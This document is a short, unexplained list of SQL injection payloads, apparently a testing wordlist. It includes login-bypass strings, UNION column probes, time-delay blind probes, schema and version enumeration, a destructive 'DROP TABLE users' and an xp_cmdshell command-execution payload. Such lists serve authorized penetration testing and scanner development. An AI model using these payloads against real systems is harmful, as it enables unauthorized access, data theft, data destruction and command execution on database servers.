# SQL Injection Payloads
' OR '1'='1
1' OR '1'='1'--
" OR "1"="1
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
' OR 1=1--
'; DROP TABLE users--
1'; WAITFOR DELAY '0:0:5'--
1' AND SLEEP(5)--
1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
' HAVING 1=1--
' ORDER BY 1--
1' AND 1=CONVERT(int,(SELECT @@version))--
1; EXEC xp_cmdshell('id')--
